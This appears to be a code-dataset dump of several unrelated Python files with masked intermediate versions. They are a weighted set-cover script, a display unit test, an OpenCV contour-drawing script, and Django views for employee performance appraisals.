itemSet=f.readline()
if itemSet == "":
break
else:
weight=int(f.readline())
arrItems=itemSet.split(" ")
i=0
# Convert each item into an int and delete any \n
for item in arrItems:
if item != "\n":
arrItems[i]=int(item)
i += 1
else:
arrItems.remove("\n")
arrItems.sort()
s=subset(weight, set(arrItems), len(arrItems), num)
subsetList.append(s)
num += 1
# print("---------------------------------------------")
# for s in subsetList:
# print(s.itemSet)
# print("---------------------------------------------")
covers = []
inc = 1
for base in subsetList:
# print()
print("base:", base.setNum)
o = findCover(base, subsetList[inc:len(subsetList)])
if o != None:
print("here!")
covers.append(o)
# print(o.setNum)
inc += 1
for w in covers:
if w.weight < minWeight:
minWeight = w.weight
# if type(s.setNum) == int: continue
# else: minCover = (s.setNum).split(" ").sort()
minCover = w.setNum
print(minWeight)
print(minCover)
# for cov in covers:
# print(cov.itemSet)
# #
|
normal
|
{
"blob_id": "b865c37623f405f67592d1eabc620d11ff87827e",
"index": 3378,
"step-1": "class subset:\n <mask token>\n\n\n<mask token>\n",
"step-2": "class subset:\n\n def __init__(self, weight, itemSet, size, setNum):\n self.weight = weight\n self.itemSet = itemSet\n self.size = size\n self.setNum = setNum\n\n\ndef findCover(base, arr):\n uniq = []\n uni = []\n if len(base.itemSet) == rangeOfVal:\n return base\n remain = rangeOfVal\n for i in arr:\n if base.itemSet.isdisjoint(i.itemSet) == True:\n uniq.append(i)\n remain = remain - len(i.itemSet)\n addedSub = subset(base.weight + i.weight, base.itemSet.union(i.\n itemSet), base.size + i.size, str(base.setNum) + ' ' + str(\n i.setNum))\n uni.append(addedSub)\n print('added:', addedSub.itemSet)\n if addedSub.size == rangeOfVal:\n return addedSub\n print()\n for j in uni:\n if remain == len(base.itemSet):\n findCover(j, uniq)\n return\n\n\n<mask token>\n",
"step-3": "class subset:\n\n def __init__(self, weight, itemSet, size, setNum):\n self.weight = weight\n self.itemSet = itemSet\n self.size = size\n self.setNum = setNum\n\n\ndef findCover(base, arr):\n uniq = []\n uni = []\n if len(base.itemSet) == rangeOfVal:\n return base\n remain = rangeOfVal\n for i in arr:\n if base.itemSet.isdisjoint(i.itemSet) == True:\n uniq.append(i)\n remain = remain - len(i.itemSet)\n addedSub = subset(base.weight + i.weight, base.itemSet.union(i.\n itemSet), base.size + i.size, str(base.setNum) + ' ' + str(\n i.setNum))\n uni.append(addedSub)\n print('added:', addedSub.itemSet)\n if addedSub.size == rangeOfVal:\n return addedSub\n print()\n for j in uni:\n if remain == len(base.itemSet):\n findCover(j, uniq)\n return\n\n\n<mask token>\nwhile True:\n itemSet = f.readline()\n if itemSet == '':\n break\n else:\n weight = int(f.readline())\n arrItems = itemSet.split(' ')\n i = 0\n for item in arrItems:\n if item != '\\n':\n arrItems[i] = int(item)\n i += 1\n else:\n arrItems.remove('\\n')\n arrItems.sort()\n s = subset(weight, set(arrItems), len(arrItems), num)\n subsetList.append(s)\n num += 1\n<mask token>\nfor base in subsetList:\n print('base:', base.setNum)\n o = findCover(base, subsetList[inc:len(subsetList)])\n if o != None:\n print('here!')\n covers.append(o)\n inc += 1\nfor w in covers:\n if w.weight < minWeight:\n minWeight = w.weight\n minCover = w.setNum\nprint(minWeight)\nprint(minCover)\n",
"step-4": "class subset:\n\n def __init__(self, weight, itemSet, size, setNum):\n self.weight = weight\n self.itemSet = itemSet\n self.size = size\n self.setNum = setNum\n\n\ndef findCover(base, arr):\n uniq = []\n uni = []\n if len(base.itemSet) == rangeOfVal:\n return base\n remain = rangeOfVal\n for i in arr:\n if base.itemSet.isdisjoint(i.itemSet) == True:\n uniq.append(i)\n remain = remain - len(i.itemSet)\n addedSub = subset(base.weight + i.weight, base.itemSet.union(i.\n itemSet), base.size + i.size, str(base.setNum) + ' ' + str(\n i.setNum))\n uni.append(addedSub)\n print('added:', addedSub.itemSet)\n if addedSub.size == rangeOfVal:\n return addedSub\n print()\n for j in uni:\n if remain == len(base.itemSet):\n findCover(j, uniq)\n return\n\n\nfileName = 'Input_attempt3.txt'\nf = open(fileName, 'r')\nrangeOfVal = int(f.readline())\nnumOfSub = int(f.readline())\nnum = 0\nminWeight = 500001\nminCover = []\nsubsetList = []\nwhile True:\n itemSet = f.readline()\n if itemSet == '':\n break\n else:\n weight = int(f.readline())\n arrItems = itemSet.split(' ')\n i = 0\n for item in arrItems:\n if item != '\\n':\n arrItems[i] = int(item)\n i += 1\n else:\n arrItems.remove('\\n')\n arrItems.sort()\n s = subset(weight, set(arrItems), len(arrItems), num)\n subsetList.append(s)\n num += 1\ncovers = []\ninc = 1\nfor base in subsetList:\n print('base:', base.setNum)\n o = findCover(base, subsetList[inc:len(subsetList)])\n if o != None:\n print('here!')\n covers.append(o)\n inc += 1\nfor w in covers:\n if w.weight < minWeight:\n minWeight = w.weight\n minCover = w.setNum\nprint(minWeight)\nprint(minCover)\n",
"step-5": "class subset:\n\tdef __init__(self, weight, itemSet, size, setNum):\n\t\tself.weight = weight\n\t\tself.itemSet = itemSet\n\t\tself.size = size\n\t\tself.setNum = setNum\n\n\ndef findCover(base, arr):\n\tuniq = [] #array that can be union\n\tuni = [] #array has been unionized w/ base\n\tif len(base.itemSet) == rangeOfVal:\n\t\t# print(\"COVER:\", base.itemSet)\n\t\treturn base\n\tremain = rangeOfVal\n\t# Search through arr to find all potential subsets\n\tfor i in arr:\n\t\t# print(\"compare: \", i.itemSet)\n\t\tif base.itemSet.isdisjoint(i.itemSet) == True:\n\t\t\t# Unique array\n\t\t\tuniq.append(i)\n\t\t\tremain = remain - len(i.itemSet)\n\t\t\t# print(\"uniq: \", len(uniq))\n\t\t\taddedSub = subset(base.weight + i.weight,\n\t\t\t\t\t\t\tbase.itemSet.union(i.itemSet),\n\t\t\t\t\t\t\tbase.size + i.size,\n\t\t\t\t\t\t\tstr(base.setNum) + \" \" + str(i.setNum))\n\t\t\t# Union array\n\t\t\tuni.append(addedSub)\n\t\t\tprint(\"added:\", addedSub.itemSet)\n\t\t\tif addedSub.size == rangeOfVal:\n\t\t\t\t# print(\"COVER:\", addedSub.itemSet)\n\t\t\t\treturn addedSub\n\tprint()\n\tfor j in uni:\n\t\t# print(j.setNum)\n\t\tif remain == len(base.itemSet):\n\t\t\tfindCover(j, uniq)\n\t# print(\"_____________________________NONE_______________________________\")\t\t \n\treturn\n\n\n\n# fileName=\"./inputs/input_group115.txt\"\nfileName=\"Input_attempt3.txt\"\nf=open(fileName, \"r\")\n\nrangeOfVal=int(f.readline()) # n\nnumOfSub=int(f.readline()) # m\nnum=0\nminWeight=500001\nminCover=[]\nsubsetList=[]\n# Loop to read through file and set up the data structures\n# to hold all the values\nwhile True:\n\titemSet=f.readline()\n\tif itemSet == \"\":\n\t\tbreak\n\telse:\n\t\tweight=int(f.readline())\n\t\tarrItems=itemSet.split(\" \")\n\t\ti=0\n\t\t# Convert each item into an int and delete any \\n\n\t\tfor item in arrItems:\n\t\t\tif item != \"\\n\":\n\t\t\t\tarrItems[i]=int(item)\n\t\t\t\ti += 
1\n\t\t\telse:\n\t\t\t\tarrItems.remove(\"\\n\")\n\t\tarrItems.sort()\n\t\ts=subset(weight, set(arrItems), len(arrItems), num)\n\t\tsubsetList.append(s)\n\tnum += 1\n\n# print(\"---------------------------------------------\")\n# for s in subsetList:\n# \tprint(s.itemSet)\n# print(\"---------------------------------------------\")\n\ncovers = []\ninc = 1\nfor base in subsetList:\n\t# print()\n\tprint(\"base:\", base.setNum)\n\to = findCover(base, subsetList[inc:len(subsetList)])\n\tif o != None:\n\t\tprint(\"here!\")\n\t\tcovers.append(o)\n\t\t# print(o.setNum)\n\tinc += 1\nfor w in covers:\n\tif w.weight < minWeight:\n\t\tminWeight = w.weight\n\t\t# if type(s.setNum) == int: continue\n\t\t# else: minCover = (s.setNum).split(\" \").sort()\n\t\tminCover = w.setNum\n\nprint(minWeight)\nprint(minCover)\n\n\n# for cov in covers:\n# \tprint(cov.itemSet)\n\n# # \n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
class TestDisplay(unittest.TestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestDisplay(unittest.TestCase):
def setUp(self):
self.display = Display(None)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestDisplay(unittest.TestCase):
def setUp(self):
self.display = Display(None)
def test_set_pixels(self):
self.display.clear_buffer()
self.display.set_pixel(0, 1, 1)
self.assertEqual(self.display.get_pixel(0, 1), 1, 'pixel was not set')
self.display.set_pixel(100, 1, 1)
self.assertEqual(self.display.get_pixel(100, 1), 1, 'pixel was not set'
)
self.display.set_pixel(3, 2, 0)
self.assertEqual(self.display.get_pixel(3, 2), 0, 'pixel was not set')
<|reserved_special_token_1|>
import unittest
from display import Display
class TestDisplay(unittest.TestCase):
def setUp(self):
self.display = Display(None)
def test_set_pixels(self):
self.display.clear_buffer()
self.display.set_pixel(0, 1, 1)
self.assertEqual(self.display.get_pixel(0, 1), 1, 'pixel was not set')
self.display.set_pixel(100, 1, 1)
self.assertEqual(self.display.get_pixel(100, 1), 1, 'pixel was not set'
)
self.display.set_pixel(3, 2, 0)
self.assertEqual(self.display.get_pixel(3, 2), 0, 'pixel was not set')
<|reserved_special_token_1|>
import unittest
from display import Display
class TestDisplay(unittest.TestCase):
def setUp(self):
self.display = Display(None)
def test_set_pixels(self):
self.display.clear_buffer()
self.display.set_pixel(0, 1, 1)
self.assertEqual(self.display.get_pixel(0, 1), 1, "pixel was not set")
self.display.set_pixel(100, 1, 1)
self.assertEqual(self.display.get_pixel(100, 1), 1, "pixel was not set")
self.display.set_pixel(3, 2, 0)
self.assertEqual(self.display.get_pixel(3, 2), 0, "pixel was not set")
|
flexible
|
{
"blob_id": "75d2dcbb0c131930602e3c1f2cf30c0e4c5e3c42",
"index": 8262,
"step-1": "<mask token>\n\n\nclass TestDisplay(unittest.TestCase):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass TestDisplay(unittest.TestCase):\n\n def setUp(self):\n self.display = Display(None)\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass TestDisplay(unittest.TestCase):\n\n def setUp(self):\n self.display = Display(None)\n\n def test_set_pixels(self):\n self.display.clear_buffer()\n self.display.set_pixel(0, 1, 1)\n self.assertEqual(self.display.get_pixel(0, 1), 1, 'pixel was not set')\n self.display.set_pixel(100, 1, 1)\n self.assertEqual(self.display.get_pixel(100, 1), 1, 'pixel was not set'\n )\n self.display.set_pixel(3, 2, 0)\n self.assertEqual(self.display.get_pixel(3, 2), 0, 'pixel was not set')\n",
"step-4": "import unittest\nfrom display import Display\n\n\nclass TestDisplay(unittest.TestCase):\n\n def setUp(self):\n self.display = Display(None)\n\n def test_set_pixels(self):\n self.display.clear_buffer()\n self.display.set_pixel(0, 1, 1)\n self.assertEqual(self.display.get_pixel(0, 1), 1, 'pixel was not set')\n self.display.set_pixel(100, 1, 1)\n self.assertEqual(self.display.get_pixel(100, 1), 1, 'pixel was not set'\n )\n self.display.set_pixel(3, 2, 0)\n self.assertEqual(self.display.get_pixel(3, 2), 0, 'pixel was not set')\n",
"step-5": "import unittest\nfrom display import Display\n\n\nclass TestDisplay(unittest.TestCase):\n def setUp(self):\n self.display = Display(None)\n\n def test_set_pixels(self):\n self.display.clear_buffer()\n self.display.set_pixel(0, 1, 1)\n self.assertEqual(self.display.get_pixel(0, 1), 1, \"pixel was not set\")\n\n self.display.set_pixel(100, 1, 1)\n self.assertEqual(self.display.get_pixel(100, 1), 1, \"pixel was not set\")\n\n self.display.set_pixel(3, 2, 0)\n self.assertEqual(self.display.get_pixel(3, 2), 0, \"pixel was not set\")\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
import cv2
import numpy as np
import random
def main():
img = cv2.imread('test_image.png',0)
res = np.zeros((img.shape[0],img.shape[1],3),np.uint8)
thresh = cv2.threshold(img, 50, 255, 0)[1]
_, contours,_ = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
for cnt in contours:
cv2.drawContours(res, [cnt],0,(random.randint(0,255),random.randint(0,255) ,random.randint(0,255)),-1)
cv2.imshow('res',res)
cv2.waitKey(0)
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "1babf9f27e6792d2a1c2545a1e3bcd08fefa0975",
"index": 5639,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n img = cv2.imread('test_image.png', 0)\n res = np.zeros((img.shape[0], img.shape[1], 3), np.uint8)\n thresh = cv2.threshold(img, 50, 255, 0)[1]\n _, contours, _ = cv2.findContours(thresh, cv2.RETR_TREE, cv2.\n CHAIN_APPROX_SIMPLE)\n for cnt in contours:\n cv2.drawContours(res, [cnt], 0, (random.randint(0, 255), random.\n randint(0, 255), random.randint(0, 255)), -1)\n cv2.imshow('res', res)\n cv2.waitKey(0)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n img = cv2.imread('test_image.png', 0)\n res = np.zeros((img.shape[0], img.shape[1], 3), np.uint8)\n thresh = cv2.threshold(img, 50, 255, 0)[1]\n _, contours, _ = cv2.findContours(thresh, cv2.RETR_TREE, cv2.\n CHAIN_APPROX_SIMPLE)\n for cnt in contours:\n cv2.drawContours(res, [cnt], 0, (random.randint(0, 255), random.\n randint(0, 255), random.randint(0, 255)), -1)\n cv2.imshow('res', res)\n cv2.waitKey(0)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import cv2\nimport numpy as np\nimport random\n\n\ndef main():\n img = cv2.imread('test_image.png', 0)\n res = np.zeros((img.shape[0], img.shape[1], 3), np.uint8)\n thresh = cv2.threshold(img, 50, 255, 0)[1]\n _, contours, _ = cv2.findContours(thresh, cv2.RETR_TREE, cv2.\n CHAIN_APPROX_SIMPLE)\n for cnt in contours:\n cv2.drawContours(res, [cnt], 0, (random.randint(0, 255), random.\n randint(0, 255), random.randint(0, 255)), -1)\n cv2.imshow('res', res)\n cv2.waitKey(0)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import cv2\nimport numpy as np \nimport random\n\n\ndef main():\n img = cv2.imread('test_image.png',0)\n res = np.zeros((img.shape[0],img.shape[1],3),np.uint8)\n thresh = cv2.threshold(img, 50, 255, 0)[1]\n _, contours,_ = cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n for cnt in contours:\n cv2.drawContours(res, [cnt],0,(random.randint(0,255),random.randint(0,255) ,random.randint(0,255)),-1)\n cv2.imshow('res',res)\n cv2.waitKey(0)\n \nif __name__ == \"__main__\":\n main()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class UpdatePerformanceView(SuccessMessageMixin, UpdateView):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class DetailPerformanceView(DetailView):
model = Performance
context_object_name = 'performance'
template_name = 'hrm/performance/performance_details.html'
def get_context_data(self, **kwargs):
context = super(DetailPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DeletePerformanceView(SuccessMessageMixin, DeleteView):
model = Performance
success_message = 'Successfully! Deleted an appraisal.'
success_url = reverse_lazy('hrm:perfom_list')
template_name = 'hrm/performance/performance_delete.html'
def get_context_data(self, **kwargs):
context = super(DeletePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ListPerformanceView(ListView):
model = Performance
context_object_name = 'performances'
template_name = 'hrm/performance/performance_list.html'
def get_context_data(self, **kwargs):
context = super(ListPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class UpdatePerformanceView(SuccessMessageMixin, UpdateView):
model = Performance
fields = 'employee', 'start_date', 'finish_date', 'objective'
success_message = 'Successfully! Updated an appraisal'
context_object_name = 'performance'
template_name = 'hrm/performance/performance_form.html'
def get_context_data(self, **kwargs):
context = super(UpdatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DetailPerformanceView(DetailView):
model = Performance
context_object_name = 'performance'
template_name = 'hrm/performance/performance_details.html'
def get_context_data(self, **kwargs):
context = super(DetailPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DeletePerformanceView(SuccessMessageMixin, DeleteView):
model = Performance
success_message = 'Successfully! Deleted an appraisal.'
success_url = reverse_lazy('hrm:perfom_list')
template_name = 'hrm/performance/performance_delete.html'
def get_context_data(self, **kwargs):
context = super(DeletePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def index(request):
if not request.session.get('username'):
return HttpResponseRedirect(reverse('accounts:login'))
applied_leaves = ApplyLeave.objects.count()
employees = Employee.objects.count()
positions = Position.objects.count()
departments = Department.objects.count()
user = User.objects.get(username=request.session['username'])
employee = Employee.objects.get(user=user.id)
return render(request, 'hrm/dashboard.html', {'employees': employees,
'positions': positions, 'departments': departments,
'applied_leaves': applied_leaves, 'employee': employee, 'user': user})
<|reserved_special_token_0|>
class CreatePerformanceView(SuccessMessageMixin, CreateView):
model = Performance
fields = 'employee', 'start_date', 'finish_date', 'objective'
success_message = 'Successfully! Created employee and appraisal...'
template_name = 'hrm/performance/performance_form.html'
def get_context_data(self, **kwargs):
context = super(CreatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class ListPerformanceView(ListView):
model = Performance
context_object_name = 'performances'
template_name = 'hrm/performance/performance_list.html'
def get_context_data(self, **kwargs):
context = super(ListPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class UpdatePerformanceView(SuccessMessageMixin, UpdateView):
model = Performance
fields = 'employee', 'start_date', 'finish_date', 'objective'
success_message = 'Successfully! Updated an appraisal'
context_object_name = 'performance'
template_name = 'hrm/performance/performance_form.html'
def get_context_data(self, **kwargs):
context = super(UpdatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DetailPerformanceView(DetailView):
model = Performance
context_object_name = 'performance'
template_name = 'hrm/performance/performance_details.html'
def get_context_data(self, **kwargs):
context = super(DetailPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DeletePerformanceView(SuccessMessageMixin, DeleteView):
model = Performance
success_message = 'Successfully! Deleted an appraisal.'
success_url = reverse_lazy('hrm:perfom_list')
template_name = 'hrm/performance/performance_delete.html'
def get_context_data(self, **kwargs):
context = super(DeletePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
<|reserved_special_token_0|>
def show_employee_perfomance_control(request):
check_user_login(request)
employee = Employee.objects.get(user=User.objects.get(username=request.
session['username']).id)
perform = Performance.objects.filter(employee=employee.id)
print(perform)
if perform is None:
return HttpResponseRedirect(reverse('hrm:hrm_index'))
return render(request, 'hrm/performance/employee_performance.html', {
'employee': employee, 'performances': perform})
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from django.shortcuts import render, get_object_or_404
from django.views.generic import ListView, CreateView, UpdateView, DeleteView, DetailView
from accounts.models import Employee
from leave.models import ApplyLeave
from departments.models import Department, Position
from django.contrib.auth.models import User
from hrm.models import Performance
from django.urls import reverse_lazy, reverse
from hrm.forms import PerformanceForm
from django.http import HttpResponseRedirect
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib import messages
from helpers.help import check_user_login
def index(request):
if not request.session.get('username'):
return HttpResponseRedirect(reverse('accounts:login'))
applied_leaves = ApplyLeave.objects.count()
employees = Employee.objects.count()
positions = Position.objects.count()
departments = Department.objects.count()
user = User.objects.get(username=request.session['username'])
employee = Employee.objects.get(user=user.id)
return render(request, 'hrm/dashboard.html', {'employees': employees,
'positions': positions, 'departments': departments,
'applied_leaves': applied_leaves, 'employee': employee, 'user': user})
<|reserved_special_token_0|>
class CreatePerformanceView(SuccessMessageMixin, CreateView):
model = Performance
fields = 'employee', 'start_date', 'finish_date', 'objective'
success_message = 'Successfully! Created employee and appraisal...'
template_name = 'hrm/performance/performance_form.html'
def get_context_data(self, **kwargs):
context = super(CreatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class ListPerformanceView(ListView):
model = Performance
context_object_name = 'performances'
template_name = 'hrm/performance/performance_list.html'
def get_context_data(self, **kwargs):
context = super(ListPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class UpdatePerformanceView(SuccessMessageMixin, UpdateView):
model = Performance
fields = 'employee', 'start_date', 'finish_date', 'objective'
success_message = 'Successfully! Updated an appraisal'
context_object_name = 'performance'
template_name = 'hrm/performance/performance_form.html'
def get_context_data(self, **kwargs):
context = super(UpdatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DetailPerformanceView(DetailView):
model = Performance
context_object_name = 'performance'
template_name = 'hrm/performance/performance_details.html'
def get_context_data(self, **kwargs):
context = super(DetailPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
class DeletePerformanceView(SuccessMessageMixin, DeleteView):
model = Performance
success_message = 'Successfully! Deleted an appraisal.'
success_url = reverse_lazy('hrm:perfom_list')
template_name = 'hrm/performance/performance_delete.html'
def get_context_data(self, **kwargs):
context = super(DeletePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user=self.request.user.id)
return context
<|reserved_special_token_0|>
def show_employee_perfomance_control(request):
check_user_login(request)
employee = Employee.objects.get(user=User.objects.get(username=request.
session['username']).id)
perform = Performance.objects.filter(employee=employee.id)
print(perform)
if perform is None:
return HttpResponseRedirect(reverse('hrm:hrm_index'))
return render(request, 'hrm/performance/employee_performance.html', {
'employee': employee, 'performances': perform})
<|reserved_special_token_0|>
def perfomance_notes(request, pk):
form = PerformanceForm(request.POST or None, instance=get_object_or_404
(Performance, pk=pk))
employee = Employee.objects.get(user=User.objects.get(username=request.
session['username']).id)
if request.method == 'POST':
if form.is_valid():
form.save()
messages.success(request,
'Successfully! Added notes on what you have done.')
return HttpResponseRedirect(reverse('hrm:perfom_employee'))
return render(request, 'hrm/performance/performance_notes.html', {
'form': form, 'employee': employee})
def appraisal(request, pk):
perform = Performance.objects.get(id=pk)
perform.status = 1
perform.save()
messages.success(request, 'Successfully! Appraised employee work....')
return HttpResponseRedirect(reverse('hrm:perfom_list'))
<|reserved_special_token_1|>
from django.shortcuts import render, get_object_or_404
from django.views.generic import ListView, CreateView, UpdateView, DeleteView, DetailView
from accounts.models import Employee
from leave.models import ApplyLeave
from departments.models import Department, Position
from django.contrib.auth.models import User
from hrm.models import Performance
from django.urls import reverse_lazy, reverse
from hrm.forms import PerformanceForm
from django.http import HttpResponseRedirect
from django.contrib.messages.views import SuccessMessageMixin
from django.contrib import messages
from helpers.help import check_user_login
# Create your views here.
def index(request):
if not request.session.get('username'):
return HttpResponseRedirect(reverse("accounts:login"))
applied_leaves = ApplyLeave.objects.count()
employees = Employee.objects.count()
positions = Position.objects.count()
departments = Department.objects.count()
user = User.objects.get(username = request.session['username'])
employee = Employee.objects.get(user = user.id)
return render(request, "hrm/dashboard.html",
{'employees': employees, 'positions': positions, 'departments': departments,
'applied_leaves': applied_leaves, "employee": employee, "user":user})
'''
Perfomance Control
'''
class CreatePerformanceView(SuccessMessageMixin, CreateView):
model = Performance
fields = ('employee', 'start_date', 'finish_date', 'objective')
success_message = "Successfully! Created employee and appraisal..."
template_name = "hrm/performance/performance_form.html"
def get_context_data(self, **kwargs):
context = super(CreatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user = self.request.user.id)
return context
class ListPerformanceView(ListView):
model = Performance
context_object_name = "performances"
template_name = "hrm/performance/performance_list.html"
def get_context_data(self, **kwargs):
context = super(ListPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user = self.request.user.id)
return context
class UpdatePerformanceView(SuccessMessageMixin, UpdateView):
model = Performance
fields = ('employee', 'start_date', 'finish_date', 'objective')
success_message = "Successfully! Updated an appraisal"
context_object_name = "performance"
template_name = "hrm/performance/performance_form.html"
def get_context_data(self, **kwargs):
context = super(UpdatePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user = self.request.user.id)
return context
class DetailPerformanceView(DetailView):
model = Performance
context_object_name = "performance"
template_name = "hrm/performance/performance_details.html"
def get_context_data(self, **kwargs):
context = super(DetailPerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user = self.request.user.id)
return context
class DeletePerformanceView(SuccessMessageMixin, DeleteView):
model = Performance
success_message = "Successfully! Deleted an appraisal."
success_url = reverse_lazy("hrm:perfom_list")
template_name = "hrm/performance/performance_delete.html"
def get_context_data(self, **kwargs):
context = super(DeletePerformanceView, self).get_context_data(**kwargs)
context['employee'] = Employee.objects.get(user = self.request.user.id)
return context
'''
Showing an employees perfomance control
'''
def show_employee_perfomance_control(request):
check_user_login(request)
employee = Employee.objects.get(user= User.objects.get(username = request.session['username']).id)
perform = Performance.objects.filter(employee = employee.id)
print(perform)
if perform is None:
return HttpResponseRedirect(reverse("hrm:hrm_index"))
return render(request, "hrm/performance/employee_performance.html", {'employee': employee, 'performances': perform})
'''
Employee Provide Notes for his perfomance
'''
def perfomance_notes(request, pk):
form = PerformanceForm(request.POST or None,instance = get_object_or_404(Performance, pk=pk))
employee = Employee.objects.get(user= User.objects.get(username = request.session['username']).id)
if request.method == "POST":
if form.is_valid():
form.save()
messages.success(request, "Successfully! Added notes on what you have done.")
return HttpResponseRedirect(reverse('hrm:perfom_employee'))
return render(request, "hrm/performance/performance_notes.html", {'form': form, 'employee': employee})
def appraisal(request, pk):
perform = Performance.objects.get(id = pk)
perform.status = 1
perform.save()
messages.success(request, "Successfully! Appraised employee work....")
return HttpResponseRedirect(reverse('hrm:perfom_list'))
|
flexible
|
{
"blob_id": "7c6ac2837751703ac4582ee81c29ccf67b8277bc",
"index": 1632,
"step-1": "<mask token>\n\n\nclass UpdatePerformanceView(SuccessMessageMixin, UpdateView):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass DetailPerformanceView(DetailView):\n model = Performance\n context_object_name = 'performance'\n template_name = 'hrm/performance/performance_details.html'\n\n def get_context_data(self, **kwargs):\n context = super(DetailPerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass DeletePerformanceView(SuccessMessageMixin, DeleteView):\n model = Performance\n success_message = 'Successfully! Deleted an appraisal.'\n success_url = reverse_lazy('hrm:perfom_list')\n template_name = 'hrm/performance/performance_delete.html'\n\n def get_context_data(self, **kwargs):\n context = super(DeletePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ListPerformanceView(ListView):\n model = Performance\n context_object_name = 'performances'\n template_name = 'hrm/performance/performance_list.html'\n\n def get_context_data(self, **kwargs):\n context = super(ListPerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass UpdatePerformanceView(SuccessMessageMixin, UpdateView):\n model = Performance\n fields = 'employee', 'start_date', 'finish_date', 'objective'\n success_message = 'Successfully! Updated an appraisal'\n context_object_name = 'performance'\n template_name = 'hrm/performance/performance_form.html'\n\n def get_context_data(self, **kwargs):\n context = super(UpdatePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass DetailPerformanceView(DetailView):\n model = Performance\n context_object_name = 'performance'\n template_name = 'hrm/performance/performance_details.html'\n\n def get_context_data(self, **kwargs):\n context = super(DetailPerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\nclass DeletePerformanceView(SuccessMessageMixin, DeleteView):\n model = Performance\n success_message = 'Successfully! Deleted an appraisal.'\n success_url = reverse_lazy('hrm:perfom_list')\n template_name = 'hrm/performance/performance_delete.html'\n\n def get_context_data(self, **kwargs):\n context = super(DeletePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return context\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef index(request):\n if not request.session.get('username'):\n return HttpResponseRedirect(reverse('accounts:login'))\n applied_leaves = ApplyLeave.objects.count()\n employees = Employee.objects.count()\n positions = Position.objects.count()\n departments = Department.objects.count()\n user = User.objects.get(username=request.session['username'])\n employee = Employee.objects.get(user=user.id)\n return render(request, 'hrm/dashboard.html', {'employees': employees,\n 'positions': positions, 'departments': departments,\n 'applied_leaves': applied_leaves, 'employee': employee, 'user': user})\n\n\n<mask token>\n\n\nclass CreatePerformanceView(SuccessMessageMixin, CreateView):\n model = Performance\n fields = 'employee', 'start_date', 'finish_date', 'objective'\n success_message = 'Successfully! Created employee and appraisal...'\n template_name = 'hrm/performance/performance_form.html'\n\n def get_context_data(self, **kwargs):\n context = super(CreatePerformanceView, self).get_context_data(**kwargs)\n context['employee'] = Employee.objects.get(user=self.request.user.id)\n return 